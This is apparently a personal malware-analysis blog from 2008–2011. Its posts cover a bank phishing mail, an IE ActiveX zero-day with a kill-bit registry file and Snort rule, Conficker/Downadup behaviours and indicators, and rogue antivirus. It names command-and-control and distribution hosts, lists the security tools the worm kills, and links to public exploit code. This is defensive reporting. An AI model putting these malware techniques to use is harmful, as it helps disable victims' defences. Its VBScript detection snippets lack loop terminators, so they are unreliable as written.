Worms And Exploits

2011-10-16T11:32:00.000-07:00

Figure 1.

Hi All, its long I blogged anything. Thought to start it again.Here is some spamming which i found, this was nicely done to collect Bank Records of HDFC Bank Customers, India.I got this mail couple of days back, here is the snapshot. Take a look at the attachment, (Figure 1. )"NetHDFC.html. Very poorly thought method, But still some people will click that.

Figure 2.

Here is next when you click on that attachment to open it. Look at the text, how beautifully written to Lure the customers to believe them. and click on the link to update their online account. (Figure 2.).

I tried to click it, see what i got in the next Figure 3.

Asking for all usual stuff. My request to all HDFC Bank customers is that please do not respond to such mails, before you do, please look at the URL in the address bar. its not HDFC.


Figure 3

Yet another 0-day for microsoft

2009-07-07T07:43:00.001-07:00

Just a day back there was a new vulnerability released, and the bad guys are already using it a big time, many of the websites are compromised and delivering malwares by using drive-by-download method.
I tried to look into it, and below is what i found some useful information on the issue.

The first and foremost thing i found is you cannot simply get infected until unless you visit a infected site.
Actually this vulnerability exists in the component provided support for digital TV applications and is installed on all versions of Windows XP by default. The vulnerability takes place when 'MPEG2TuneRequest' is accessed which is an object of ActiveX and gets triggered if the object is initialized with malformed input through the 'data' parameter. This vulnerability is mostly exploited when a user visits a maliciously crafted web page. On successful exploit it results in an access with user level privileges by the attacker. Now if the attacker has enough system privileges then he could install programs; view, change, or delete data; or create new accounts with full user rights.

There are few turn around given already by Microsoft.

1. Set the kill-bit for the ClassID which is asscociated with this Microsoft DirectShow (msvidctl.dll).
I have given a .reg file below with is article you can use it to set the kill-bit. just copy paste and create a .reg file and use it.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{011B3619-FE63-4814-8A84-15A194CE9CE3}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0149EEDF-D08F-4142-8D73-D23903D21E90}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0369B4E5-45B6-11D3-B650-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0369B4E6-45B6-11D3-B650-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{055CB2D7-2969-45CD-914B-76890722F112}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{15D6504A-5494-499C-886C-973C9E53B9F1}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{1BE49F30-0E1B-11D3-9D8E-00C04F72D980}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{1C15D484-911D-11D2-B632-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{1DF7D126-4050-47F0-A7CF-4C4CA9241333}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{2C63E4EB-4CEA-41B8-919C-E947EA19A77C}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{334125C0-77E5-11D3-B653-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{37B0353C-A4C8-11D2-B634-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{37B03543-A4C8-11D2-B634-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{37B03544-A4C8-11D2-B634-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{418008F3-CF67-4668-9628-10DC52BE1D08}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{4A5869CF-929D-4040-AE03-FCAFC5B9CD42}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{577FAA18-4518-445E-8F70-1473F8CF4BA4}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{59DC47A8-116C-11D3-9D8E-00C04F72D980}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7F9CB14D-48E4-43B6-9346-1AEBC39C64D3}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{823535A0-0318-11D3-9D8E-00C04F72D980}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8872FF1B-98FA-4D7A-8D93-C9F1055F85BB}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8A674B4C-1F63-11D3-B64C-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8A674B4D-1F63-11D3-B64C-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9CD64701-BDF3-4D14-8E03-F12983D86664}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9E77AAC4-35E5-42A1-BDC2-8F3FF399847C}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A1A2B1C4-0E3A-11D3-9D8E-00C04F72D980}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A2E3074E-6C3D-11D3-B653-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A2E30750-6C3D-11D3-B653-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{A8DCF3D5-0780-4EF4-8A83-2CFFAACB8ACE}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{AD8E510D-217F-409B-8076-29C5E73B98E8}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{B0EDF163-910A-11D2-B632-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{B64016F3-C9A2-4066-96F0-BD9563314726}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{BB530C63-D9DF-4B49-9439-63453962E598}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C531D9FD-9685-4028-8B68-6E1232079F1E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C5702CCC-9B79-11D3-B654-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C5702CCD-9B79-11D3-B654-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C5702CCE-9B79-11D3-B654-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C5702CCF-9B79-11D3-B654-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C5702CD0-9B79-11D3-B654-00C04F79498E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{C6B14B32-76AA-4A86-A7AC-5C79AAF58DA7}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CAAFDD83-CEFC-4E3D-BA03-175F17A24F91}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D02AAC50-027E-11D3-9D8E-00C04F72D980}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F9769A06-7ACA-4E39-9CFB-97BB35F0E77E}]
“Compatibility Flags”=dword:00000400
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FA7C375B-66A7-4280-879D-FD459C84BB02}]
“Compatibility Flags”=dword:00000400

2. If you are using any snort based IDS you can use the follwoing snort rule to capture the attack and prevent it.

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"msg:"ET CURRENT_EVENTS Microsoft Video ActiveX Control-Vulnerability Load";flow:to_client,established; content:"clsid"; nocase;content:"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX"; nocase; classtype:web-application-attack; sid:2009xxx; rev:0;)

XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX ---> is the class IDs mentioned above. (replace this with above class IDs)

=================================================================================================
Few more are there in the below link.
http://doc.emergingthreats.net/bin/view/Main/2009493

References:
http://www.microsoft.com/technet/security/advisory/972890.mspx
http://isc.sans.org/diary.html?storyid=6733

New Variant: W32.Downadup.C

2009-03-09T06:56:00.000-07:00

New Variant: W32.Downadup.C

Guys the new variant is out, as expected.
This is the third version of Downadup called as "W32.Downadup.C" this is the update component for machines currently infected with Downadup old variants. This new variant provides more powerful commands to the infected machines to disable antivirus software and other detection and analysis tools. The update also includes not to self-replicate and to behave more like a Trojan than a worm.
The new variant of Downadup is now generating 50, 000 domains rather than from a 250 domain generation in earlier versions, also uses one of a possible 116 domain suffixes.

Any processes found on an infected machine from the list below are killed:

•    wireshark
•    unlocker
•    tcpview
•    sysclean
•    scct_
•    regmon
•    procmon
•    procexp
•    ms08-06
•    mrtstub
•    mrt.
•    mbsa.
•    klwk
•    kido
•    kb958
•    kb890
•    hotfix
•    gmer
•    filemon
•    downad
•    confick
•    avenger
•    autoruns

It lowers the security settings by deleting the following registry entry to prevent automatic startup of certain software:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\"Windows Defender"

It disables Windows Security Alert notifications by deleting the following registry subkey:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ShellServiceObjects\{FD6905CE-952F-41F1-9A6F-135D9C6622CC}

It also deletes the following registry entry to prevent the compromised computer from restarting in safe mode:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot

The security risk then copies itself to one of the following locations:

%ProgramFiles%\Internet Explorer\[RANDOM FILE NAME].dll
%ProgramFiles%\Movie Maker\[RANDOM FILE NAME].dll
%ProgramFiles%\Windows Media Player\[RANDOM FILE NAME].dll
%System%\Windows NT\[RANDOM FILE NAME].dll

I will update you more on this issue once i get from my findings.

More in depth information and removal instructions can be found here

http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-030614-5852-99&tabid=2

Reference:
https://forums2.symantec.com/t5/Malicious-Code/W32-Downadup-C-Digs-in-Deeper/ba-p/393245

Exploitation of MS09-002

2009-02-17T07:29:00.001-08:00

Today Trend Micro reported a exploit related to the vulnerability of Microsoft Security Bulletin MS09-002. (CVE-2009-0075).

Successful exploits allow attackers to execute arbitrary code in the context of the user running Internet Explorer.

Till now exploitation of this issue is limited to targeted attacks. The exploit is delivered by a malicious .doc file to a user. When the user opens a file, an ActiveX control included in the file tries to download and open a malicious HTML file that is apecifically designed to exploit this issue. And on successful exploitation, a backdoor is installed on the vulnerable computer. The malicious code then is used to steal information from the exploited computer and sends it to a remote computer over TCP port 443.

Till now i have only this much Info, when i will get more will update you.

Remedy:
Cumulative Security Update for Internet Explorer (961260)
http://www.microsoft.com/technet/security/Bulletin/MS09-002.mspx

Reference
Patch Microsoft Internet Explorer Uninitialized Memory Remote Code Execution Vulnerability

http://www.securityfocus.com/bid/33627
http://blog.trendmicro.com/another-exploit-targets-ie7-bug/

Kaspersky Hacked by SQL injection

2009-02-15T23:53:00.000-08:00

Hi readers, though it's an week old event still I thought to put it across what exactly has happened with two Antivirus vendors, Kaspersky (usa.kaspersky.com) and BitDefender.

Someone (a hacker) hacked into their database and released 40,000 + customer information,

He just did it over a SQL injection on their websites. He named himself as UNU in HaskersBlog.org, have a look.

Some info more on this are at below mentioned URLs.

http://technicalinfodotnet.blogspot.com/2009/02/kaspersky-usa-portal-sql-injection.html

http://www.darkreading.com/security/attacks/showArticle.jhtml;jsessionid=BE4VOR3YATACEQSNDLPSKH0CJUNN2JVN?articleID=213401799

Trojan.Brisv.A Infection toll again

2009-02-13T05:29:00.001-08:00

There is one old trojan which is again started taking its toll, that is named as Trihan.Brisv.A by Symantec, though it was discovered on July last year, this is also known as W32/GetCodec-A by Sophos. Well how is this delivered is very simple, its basically delivered by the P2P and/or warez sires, when someone is looking for some cracks or keygens, so while downloading those, all what they get is the trojan infected files, and once activated by trying to open those files, they eventually infect all the media files on the victims system, such as ASF, WMV, WMA, MP2, MP3.

And when these media files are accessed they trigget a connection to malicious links from where it receives an encrypted file with more malicious URLs to download various malware files. This trojan basically injects a script command in the media file header. This script command in this case is "URLANDEXIT", which is followed by a URL ( in this case a malicious URL ), which will be opened with the default browser of the victim system when playing the media file.

As i have seen in different information sources, that this is now going to hxxp://isvbr.net where it gets a 302 redirect command to go to a website named hxxp://www.play-error.com, which is allowing the user to download a reg file to fix the problem of media file not being able to open and play. This site is also delivering multiple payloads and other malwares.

You can use the following tool to see if there is any script command being embeded in the infected media files or you have a file which is downloaded from internet and you are not able to play it.

http://handlers.sans.org/bzdrnja/findasfcommands.zip

How to use it : http://isc.sans.org/diary.html?storyid=4664

More detailed analysis is given here

http://safeweb.norton.com/report/show?url=http%3A%2F%2Fwww.isvbr.net&x=0&y=0
http://blog.threatexpert.com/2009/02/trojan-getcodecbrisv-comes-back-again.html

Removal Instruction:
http://www.symantec.com/security_response/writeup.jsp?docid=2008-071823-1655-99&tabid=3

Removal Tool:
http://www.symantec.com/content/en/us/global/removal_tool/threat_writeups/FixBrisvA.exe

W32.Downadup Removal Tool

2009-02-05T05:59:00.001-08:00

For those who are still looking for the removal tool for Downadup, there is something from Symantec
have a look.

http://www.symantec.com/business/security_response/writeup.jsp?docid=2009-011316-0247-99

Botnet and DNS

2009-01-22T11:48:00.001-08:00

Some good article is posted here in relation to Botnet and DNS relations, have a look.

http://wormsandexploits.blogspot.com/2008/11/relation-between-botnet-and-dns.html
http://wormsandexploits.blogspot.com/2008/11/how-bots-are-spread_3465.html
http://wormsandexploits.blogspot.com/2008/11/botnets-vs-botnets.html
http://wormsandexploits.blogspot.com/2008/11/cell-phone-botnetsthe-newest-threat-in.html

W32.Downadup Infection Pattern

2009-01-07T05:41:00.000-08:00

Today let me tell you something about the update mechanism of the latest worm w32.Downdup and w32.Downdup.B. Once the host is infected it generates approx 250 random domain addresses and these addresses are unique to a given day and date, this is done in a view to contact those domain in a latter stage to get the updated files. So the question is why the malicious code writers are using this technique, well this is done in a view to keep the security companies to blacklist the domain used by the code writers for the malicious activities, as the domains will not be known until the day reaches and gets generated by the worm, and moreover the author of the worm may pre-choose a given date and a domain of his choice from the list of domains to be generated for that day.

For more details visit the full research by Symantec.

https://forums.symantec.com/t5/blogs/blogarticlepage/blog-id/malicious_code/article-id/224

Zune Player Bug and Fix

2009-01-05T06:13:00.000-08:00

There is another big flaw from Microsoft on its competitor MP3 player to iPod, ZUNE is having a bug. This bug came to picture on 31^st Dec 2008 night during midnight. This issue came up in 2006 model Zune 30GB devices. Actually Zune could not handle that 2008 had 366 days, instead of the 365, so the beautiful gadgets broke down. On January 1 2009, the software automatically checks its internal clock again and would have got past the missing day. This is basically a bug in the internal clock driver and the way the device handles a leap year. But Microsoft is quick to give the fix and claims that this will not be re occurred in the next Leap year in 2012.

There is a fix o got while surfing through the different forums. Here is the Fix.

To Fix Your Zune Follow These Steps:

1. Disconnect your Zune from USB and AC power sources.

2. Because the player is frozen, its battery will drain-this is good. Wait until the battery is empty and the screen goes black. If the battery was fully charged, this might take a couple of hours.

3. Wait until after noon GMT on January 1, 2009 (that's 7 a.m. Eastern or 4 a.m. Pacific time).

4. Connect your Zune to either a USB port on the back or your computer or to AC power using the Zune AC Adapter and let it charge.

1. Once the battery has sufficient power, the player should start normally. No other action is required-you can go back to using your Zune!

Further there is also a fix in the ZUNE support website.

http://www.zune.net/en-US/support

References

W32.Downadup and W32.Downadup.B related to Bot and Botnet

2009-01-04T23:16:00.001-08:00

I found some bot and Botnet activity information related to the latest worm W32.Downadup and W32.Downadup.B yesterday while going through some articles, have a look at the following link for details.

http://wormsandexploits.blogspot.com/2009/01/found-bot-and-botnet-related-to_04.html

W&E

W32.Downadup and W32.Downadup.B related Bot and Botnet.....

2009-01-04T09:23:00.001-08:00

Hi, its Sunday today and I was looking through the internet to get some more info on the latest menace (yes I call it a menace, its creating a lot of people digging information on the net to get rid of it), and you know what, I got some more new links to write for this article to publish in my blog. I was looking on to the Microsoft website for the worm Win32/Conficker.A and Win32/Conficker.B, I got a new lead that this worm is also linked with a Botnet backdoor named as Backdoor:Win32/IRCbot.BH by Microsoft. Wow the Botnet herders are doing a big time, you know what this bot is a Backdoor, and which gets its commands from an attacker via an IRC server. Backdoor:Win32/IRCbot.BH is used by bots attempting to exploit MS08-067.

This Trojan when executed create files in "Program Files" folder as an exe files with the following names.

mediaavi.exe

msgaurd.exe

soundmax.exe

This also modifies the registry value as per the following:

Adds value: "MS Gaurd Driver"

With data: "%ProgramFiles%\msgaurd.exe"

Adds value: "SoundMAX Driver"

With data: "%ProgramFiles%\soundmax.exe"

Adds value: "MediaAVI Driver"

With data: "%ProgramFiles%\mediaavi.exe"

To subkeys:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

The Trojan stays resident in memory and connects to a hard-coded remote IRC server and awaits commands from the Botnet master. And the commands could include sending the trojan to other computers by using hard-coded exploits.

It also modifies the registry to add the trojan to the Windows Firewall for authorizing in its authorized applications list.

Adds value: "<Win32/IRCbot.BH path and filename>" (probably the one of the three from above locations)

With data: "enabled:soundmax driver:*:<Win32/IRCbot.BH path and filename>"

To subkey: HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\
FirewallPolicy\StandardProfile\AuthorizedApplications\List

After making all necessary copying of executables and registry entries it attempts to connect to the hard-coded remote IRC server named '0x90 [dot] devtech [dot] us' using TCP port 6556 and then this trojan joins a pre-decided channel and awaits commands from an attacker. Using this backdoor, the attacker can order this bot to attempt to spread and infect more and increase its Botnet army by scanning for available computers and attempts to connect to them and attempts to execute remote code by first running exploit code against the target computer which are vulnerable and not yet patched by Security Bulletin MS08-067.

I tried to write two small VBScript to find those Botnet executable files in Program Files and the relevant registry entry.

Find in Program Files.

strDir = "c:\Program Files\" 'Change the location of Path of "Program Files" according to your location

Set FSO = CreateObject("Scripting.FileSystemObject")

Set objDir = FSO.GetFolder(strDir)

getInfo(objDir)

Sub getInfo(pCurrentDir)

Dim checkName

Dim checkVal

checkVal=False

For Each aItem In pCurrentDir.Files

If LCase(Right(Cstr(aItem.Name),4)) = ".exe" Then

if aItem.Name="msgaurd.exe" or aItem.Name="soundmax.exe" or aItem.Name="mediaavi.exe" then

checkName=checkName + ", " +aItem.Name

checkVal=True

End if

End If

if checkVal=True then

MsgBox "Bot Files " & checkName & " Present"

else

MsgBox "Bot files not present"

End if

End Sub

For the registry Entries:

const HKEY_LOCAL_MACHINE = &H80000002

strComputer = "."

Set StdOut = WScript.StdOut

Set oReg=GetObject( "winmgmts:{impersonationLevel=impersonate}!\\" & strComputer & "\root\default:StdRegProv")

strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

For i=0 to 2

SELECT CASE i

CASE 0

strValueName0 = "MS Gaurd Driver"

oReg.GetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName0,dwValue0

CASE 1

strValueName1 = "SoundMAX Driver"

oReg.GetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName1,dwValue1

CASE 2

strValueName2 = "MediaAVI Driver"

oReg.GetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName2,dwValue2

END SELECT

MsgBox "Trojan Entries Found:" & vbcrlf & dwValue0 & vbcrlf & dwValue1 & vbcrlf & dwValue2

References

1. Worm:Win32/Conficker.A (Microsoft)

2. Worm:Win32/Conficker.B (Microsoft)

3. Backdoor:Win32/IRCbot.BH (Microsoft)

4. http://blogs.technet.com/mmpc/archive/2008/11/25/more-ms08-067-exploits.aspx

5. http://blogs.technet.com/mmpc/archive/2008/11/17/a-quick-update-about-ms08_2D00_067-exploits.aspx

W32.Downadup.B registry removal tool available......

2009-01-02T22:17:00.001-08:00

Hi, just was going through the symantec site for some more intel on W32.Downadup.B, came accross a registry removal tool for the W32.Downadup.B. There is also some bot and botnet related activity found kindly visit the bellow link for full details.

http://wormsandexploits.blogspot.com/2009/01/found-bot-and-botnet-related-to_04.html

Kindly find it here with removal instruction.
http://www.symantec.com/security_response/writeup.jsp?docid=2004-050614-0532-99

Rouge software detected ExpressAntiVirus2009

2009-01-02T01:35:00.000-08:00

There is a new Rouge software detected at the begining of new year, this is named as ExpressAntiVirus2009. This is being detected by multiple antivirus vendors as Misleading application.

It creates the following entries in various places.

It creates the following files:
%ProgramFiles%\exav\av.ini
%ProgramFiles%\exav\base.dll
%ProgramFiles%\exav\borlndmm.dll
%ProgramFiles%\exav\expressav.exe

It also create files in the %Temp% folder.

It also creates the following registry entry so that it executes whenever Windows starts:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"av" = "C:\Program Files\exav\expressav.exe"

It modifies the following registry entries:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"NoFind" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"NoRun" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"NoSMHelp" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"NoSetFolders" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\"NoViewOnDrive" = "3FFFFFF"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\"DisableRegistryTools" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\"DisableTaskMgr" = "1"
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions\"NoBrowserOptions" = "1"

a removal instruction is being given by symantec.
http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-123111-2625-99&tabid=3

The Activity Increased on Port 445..Due to W32.Downadup.B

2009-01-02T00:28:00.001-08:00

After the release of the new variant the activity on port 445/TCP has been increased.
See the graph at SANS diary from Dec 30th till Jan 01.

http://isc.sans.org/portascii.html?port=445&start=2008-12-30&end=2009-01-01
This clearly tells us that the worm is still on the move.
Also look for my earlier two posts on this for details.

This new variant of W32.Downadup is also capable of the following

It can disable Windows Update
Block access to anti-virus web sites
Perform brute force attacks on local windows and shared drives on the network
Finding the local IP address and and then changing the desktop firewall rules to allow access to remote attackers
Finally Creating a web server on the local computer for using it to infect more systems.

Look for the following Registry Modifications for the presence of this worm

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<%random_dllname%>
DisplayName = ""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<%random_dllname%>
Type = dword:00000020
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<%random_dllname%>
Start = dword:00000002
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<%random_dllname%>
ErrorControl dword:00000000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<%random_dllname%>
ImagePath = "%SystemRoot%\system32\svchost.exe -k netsvcs"
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\<%random_dllname%>
ObjectName = "LocalSystem"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Nls
(Default) = dword:%Number%

Some workarounds and a detailed information is available here
http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx

There is a removal tool virus W32.Downadup.B being posted by F-Secure
ftp://ftp.f-secure.com/anti-virus/tools/DownadupRemovalTool.zip

Just some updates about the W32.Downadup.B......

2009-01-01T00:06:00.001-08:00

Hey guys just thought to update you all on the trends of this latest worm,
Just try to look for symptoms where there is a large scan for Port 445/TCP
(Remember its a RPC exploit) on your network, this means the worm is
looking for a vulnerable machine, also you can look IDS/IPS the logs for the
presence of connection attempts to ADMIN$, remember again that this new
variant tries to exploit the admin$ with weak passwords, so the another thing
which you may want to co-relate with the logs are the failed attempts to logon
to the network shares along with the attempt to ADMIN$, also try to look for
presence of "\\Pipe\\browser" in the session data for the suspected logs.

Reference:

See the exploit code.
http://www.milw0rm.com/exploits/7104
http://wormsandexploits.blogspot.com/2008/12/yet-another-variant-of-w32downadup-just.html

Yet another variant of W32.Downadup Just before new year....... W32.Downadup.B

2008-12-31T00:25:00.000-08:00

Yet another variant of W32.Downadup right before the new year, its now W32.Downadup.B as reported by Symantec which is trying to exploit with the earlier version of MS-08067 (you can refer to my earlier post on Nov 25^th on this issue) Server service vulnerability, one such POC is been given by SecurityFocus on Oct 24.

As far as I understood from the Symantec Security response posting on this new variant, it exploits the systems and spread via network shares with weak passwords and blocks access to security-related Web sites too, the worm has a feature to delete all restore points, which is really bad. All major versions of windows are effected by this if not yet patched.

You can check for the presence of this virus by checking on the following locations for the specific files mentioned.

%ProgramFiles%\Internet Explorer\[RANDOM FILE NAME].dll
%ProgramFiles%\Movie Maker\[RANDOM FILE NAME].dll
%System%\[RANDOM FILE NAME].dll
%Temp%\[RANDOM FILE NAME].dll
C:\Documents and Settings\All Users\Application Data \[RANDOM FILE NAME].dll

You can also look for the following registry entries.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\"dl" = "0"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Applets\"dl" = "0"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\"ds" = "0"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Applets\"ds" = "0"

It creates the following registry entry too so that it runs every time Windows starts:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\"[RANDOM NAME]" = "rundll32.exe "[RANDOM FILE NAME].dll", ydmmgvos"

You can check for the presence of following registry entry which enables the worm to spread rapidly over the network:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\"TcpNumConnections" = "00FFFFFE"

The worm also copies itself to any accessible mapped drive as the following file:

%DriveLetter%\RECYCLER\S-%d-%d-%d-%d%d%d-%d%d%d-%d%d%d-%d\[RANDOM FILE NAME].dll
%DriveLetter%\autorun.inf

Oh yes one more new feature added to this worm, it now queries a new domain to get the public IP address of the infected computer apart form the domains it was accessing earlier is:

http://www.whatsmyipaddress.com

I hope that this post gave you all a brief idea, for detailed reading kindly visit the Symantec link at :

http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-123015-3826-99&tabid=2

Reference:

Interesting article about ECard Virus...Must read

2008-12-30T03:06:00.001-08:00

"......First, I'll tell you a little bit about the worm. W32.Waledac is a worm that sends emails containing a link to an apparent Christmas e-card that you have received. However, when the link for the e-card in the email is visited, you receive a copy of the worm instead of a greeting card. The file name used by the worm is ecard.exe and the links are all Christmas related, such as:......."

This is what i got in SecurityFocus, read the full story here.....

http://www.securityfocus.com/blogs/1539

W&E
